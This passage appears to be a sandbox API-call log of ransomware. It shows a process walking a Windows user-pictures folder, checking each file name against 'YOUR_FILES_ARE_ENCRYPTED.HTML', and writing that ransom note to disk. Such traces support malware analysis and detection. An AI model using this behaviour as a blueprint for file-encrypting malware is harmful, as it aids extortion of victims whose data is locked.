(pszPath="usertile21.bmp") returned=".bmp" [0157.233] lstrlenW (lpString=".bmp") returned 4 [0157.233] PathFindExtensionW (pszPath="usertile21.bmp") returned=".bmp" [0157.233] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5283da4e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5283da4e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1f3f3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile22.bmp", cAlternateFileName="")) returned 1 [0157.233] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp") returned 82 [0157.233] lstrcmpW (lpString1="usertile22.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.233] PathFindExtensionW (pszPath="usertile22.bmp") returned=".bmp" [0157.233] lstrlenW (lpString=".bmp") returned 4 [0157.233] PathFindExtensionW (pszPath="usertile22.bmp") returned=".bmp" [0157.234] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52863bb6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52863bb6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1f6555c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile23.bmp", cAlternateFileName="")) returned 1 [0157.234] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp") returned 82 [0157.234] lstrcmpW (lpString1="usertile23.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") 
returned -1 [0157.234] PathFindExtensionW (pszPath="usertile23.bmp") returned=".bmp" [0157.234] lstrlenW (lpString=".bmp") returned 4 [0157.234] PathFindExtensionW (pszPath="usertile23.bmp") returned=".bmp" [0157.234] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528afe86, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x528afe86, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf2238f7c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile24.bmp", cAlternateFileName="")) returned 1 [0157.234] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp") returned 82 [0157.234] lstrcmpW (lpString1="usertile24.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.234] PathFindExtensionW (pszPath="usertile24.bmp") returned=".bmp" [0157.234] lstrlenW (lpString=".bmp") returned 4 [0157.234] PathFindExtensionW (pszPath="usertile24.bmp") returned=".bmp" [0157.234] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528d5fee, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x528d5fee, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf225f0dc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile25.bmp", cAlternateFileName="")) returned 1 [0157.234] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp") returned 82 [0157.234] lstrcmpW (lpString1="usertile25.bmp", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.234] PathFindExtensionW (pszPath="usertile25.bmp") returned=".bmp" [0157.234] lstrlenW (lpString=".bmp") returned 4 [0157.234] PathFindExtensionW (pszPath="usertile25.bmp") returned=".bmp" [0157.234] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528d5fee, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x528d5fee, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf228523c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile26.bmp", cAlternateFileName="")) returned 1 [0157.234] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp") returned 82 [0157.234] lstrcmpW (lpString1="usertile26.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.234] PathFindExtensionW (pszPath="usertile26.bmp") returned=".bmp" [0157.234] lstrlenW (lpString=".bmp") returned 4 [0157.235] PathFindExtensionW (pszPath="usertile26.bmp") returned=".bmp" [0157.235] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x529222be, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x529222be, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf22ab39c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile27.bmp", cAlternateFileName="")) returned 1 [0157.235] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp") returned 82 
[0157.235] lstrcmpW (lpString1="usertile27.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.235] PathFindExtensionW (pszPath="usertile27.bmp") returned=".bmp" [0157.235] lstrlenW (lpString=".bmp") returned 4 [0157.235] PathFindExtensionW (pszPath="usertile27.bmp") returned=".bmp" [0157.235] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52948426, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52948426, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf22ab39c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile28.bmp", cAlternateFileName="")) returned 1 [0157.235] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp") returned 82 [0157.235] lstrcmpW (lpString1="usertile28.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.235] PathFindExtensionW (pszPath="usertile28.bmp") returned=".bmp" [0157.235] lstrlenW (lpString=".bmp") returned 4 [0157.235] PathFindExtensionW (pszPath="usertile28.bmp") returned=".bmp" [0157.235] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5296e58e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5296e58e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf22d14fc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile29.bmp", cAlternateFileName="")) returned 1 [0157.235] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account 
Pictures\\Default Pictures\\usertile29.bmp") returned 82 [0157.235] lstrcmpW (lpString1="usertile29.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.235] PathFindExtensionW (pszPath="usertile29.bmp") returned=".bmp" [0157.235] lstrlenW (lpString=".bmp") returned 4 [0157.235] PathFindExtensionW (pszPath="usertile29.bmp") returned=".bmp" [0157.235] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x529946f6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x529946f6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf234391c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile30.bmp", cAlternateFileName="")) returned 1 [0157.235] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp") returned 82 [0157.235] lstrcmpW (lpString1="usertile30.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.235] PathFindExtensionW (pszPath="usertile30.bmp") returned=".bmp" [0157.236] lstrlenW (lpString=".bmp") returned 4 [0157.236] PathFindExtensionW (pszPath="usertile30.bmp") returned=".bmp" [0157.236] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x529ba85e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x529ba85e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf234391c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile31.bmp", cAlternateFileName="")) returned 1 [0157.236] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp") returned 82 [0157.236] lstrcmpW (lpString1="usertile31.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.236] PathFindExtensionW (pszPath="usertile31.bmp") returned=".bmp" [0157.236] lstrlenW (lpString=".bmp") returned 4 [0157.236] PathFindExtensionW (pszPath="usertile31.bmp") returned=".bmp" [0157.236] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a06b2e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52a06b2e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf238fbdc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile32.bmp", cAlternateFileName="")) returned 1 [0157.236] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp") returned 82 [0157.236] lstrcmpW (lpString1="usertile32.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.236] PathFindExtensionW (pszPath="usertile32.bmp") returned=".bmp" [0157.236] lstrlenW (lpString=".bmp") returned 4 [0157.236] PathFindExtensionW (pszPath="usertile32.bmp") returned=".bmp" [0157.236] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a52dfe, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52a52dfe, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf238fbdc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile33.bmp", cAlternateFileName="")) returned 1 [0157.236] wnsprintfW (in: pszDest=0x75f0050, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp") returned 82 [0157.236] lstrcmpW (lpString1="usertile33.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.236] PathFindExtensionW (pszPath="usertile33.bmp") returned=".bmp" [0157.236] lstrlenW (lpString=".bmp") returned 4 [0157.236] PathFindExtensionW (pszPath="usertile33.bmp") returned=".bmp" [0157.236] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a78f66, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52a78f66, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf23b5d3c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile34.bmp", cAlternateFileName="")) returned 1 [0157.236] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp") returned 82 [0157.236] lstrcmpW (lpString1="usertile34.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.236] PathFindExtensionW (pszPath="usertile34.bmp") returned=".bmp" [0157.237] lstrlenW (lpString=".bmp") returned 4 [0157.237] PathFindExtensionW (pszPath="usertile34.bmp") returned=".bmp" [0157.237] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a9f0ce, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52a9f0ce, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf23dbe9c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile35.bmp", cAlternateFileName="")) returned 1 
[0157.237] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp") returned 82 [0157.237] lstrcmpW (lpString1="usertile35.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.237] PathFindExtensionW (pszPath="usertile35.bmp") returned=".bmp" [0157.237] lstrlenW (lpString=".bmp") returned 4 [0157.237] PathFindExtensionW (pszPath="usertile35.bmp") returned=".bmp" [0157.237] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52aeb39e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52aeb39e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf2401ffc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile36.bmp", cAlternateFileName="")) returned 1 [0157.237] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp") returned 82 [0157.237] lstrcmpW (lpString1="usertile36.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.237] PathFindExtensionW (pszPath="usertile36.bmp") returned=".bmp" [0157.237] lstrlenW (lpString=".bmp") returned 4 [0157.237] PathFindExtensionW (pszPath="usertile36.bmp") returned=".bmp" [0157.237] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52aeb39e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52aeb39e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf242815c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, 
cFileName="usertile37.bmp", cAlternateFileName="")) returned 1 [0157.237] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp") returned 82 [0157.237] lstrcmpW (lpString1="usertile37.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.237] PathFindExtensionW (pszPath="usertile37.bmp") returned=".bmp" [0157.237] lstrlenW (lpString=".bmp") returned 4 [0157.237] PathFindExtensionW (pszPath="usertile37.bmp") returned=".bmp" [0157.237] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b3766e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52b3766e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf244e2bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile38.bmp", cAlternateFileName="")) returned 1 [0157.237] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp") returned 82 [0157.238] lstrcmpW (lpString1="usertile38.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.238] PathFindExtensionW (pszPath="usertile38.bmp") returned=".bmp" [0157.238] lstrlenW (lpString=".bmp") returned 4 [0157.238] PathFindExtensionW (pszPath="usertile38.bmp") returned=".bmp" [0157.238] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b5d7d6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52b5d7d6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf247441c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, 
nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile39.bmp", cAlternateFileName="")) returned 1 [0157.238] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp") returned 82 [0157.238] lstrcmpW (lpString1="usertile39.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.238] PathFindExtensionW (pszPath="usertile39.bmp") returned=".bmp" [0157.238] lstrlenW (lpString=".bmp") returned 4 [0157.238] PathFindExtensionW (pszPath="usertile39.bmp") returned=".bmp" [0157.238] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52b8393e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52b8393e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf249a57c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile40.bmp", cAlternateFileName="")) returned 1 [0157.238] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp") returned 82 [0157.238] lstrcmpW (lpString1="usertile40.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.238] PathFindExtensionW (pszPath="usertile40.bmp") returned=".bmp" [0157.238] lstrlenW (lpString=".bmp") returned 4 [0157.238] PathFindExtensionW (pszPath="usertile40.bmp") returned=".bmp" [0157.238] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52ba9aa6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52ba9aa6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf249a57c, 
ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile41.bmp", cAlternateFileName="")) returned 1 [0157.238] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp") returned 82 [0157.238] lstrcmpW (lpString1="usertile41.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.238] PathFindExtensionW (pszPath="usertile41.bmp") returned=".bmp" [0157.238] lstrlenW (lpString=".bmp") returned 4 [0157.238] PathFindExtensionW (pszPath="usertile41.bmp") returned=".bmp" [0157.239] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52bcfc0e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52bcfc0e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf257edbc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile42.bmp", cAlternateFileName="")) returned 1 [0157.239] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp") returned 82 [0157.239] lstrcmpW (lpString1="usertile42.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.239] PathFindExtensionW (pszPath="usertile42.bmp") returned=".bmp" [0157.239] lstrlenW (lpString=".bmp") returned 4 [0157.239] PathFindExtensionW (pszPath="usertile42.bmp") returned=".bmp" [0157.239] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52bf5d76, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52bf5d76, ftLastAccessTime.dwHighDateTime=0x1ca0408, 
ftLastWriteTime.dwLowDateTime=0xf25a4f1c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile43.bmp", cAlternateFileName="")) returned 1 [0157.239] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp") returned 82 [0157.239] lstrcmpW (lpString1="usertile43.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.239] PathFindExtensionW (pszPath="usertile43.bmp") returned=".bmp" [0157.239] lstrlenW (lpString=".bmp") returned 4 [0157.239] PathFindExtensionW (pszPath="usertile43.bmp") returned=".bmp" [0157.239] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c1bede, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52c1bede, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf25cb07c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile44.bmp", cAlternateFileName="")) returned 1 [0157.239] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp") returned 82 [0157.239] lstrcmpW (lpString1="usertile44.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.239] PathFindExtensionW (pszPath="usertile44.bmp") returned=".bmp" [0157.239] lstrlenW (lpString=".bmp") returned 4 [0157.239] PathFindExtensionW (pszPath="usertile44.bmp") returned=".bmp" [0157.239] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c1bede, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52c1bede, 
ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf25cb07c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile44.bmp", cAlternateFileName="")) returned 0 [0157.239] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.241] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0157.241] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.245] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.247] CloseHandle (hObject=0x5a0) returned 1 [0157.248] GetProcessHeap () returned 0x270000 [0157.249] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.249] FindNextFileW (in: hFindFile=0x42f3140, 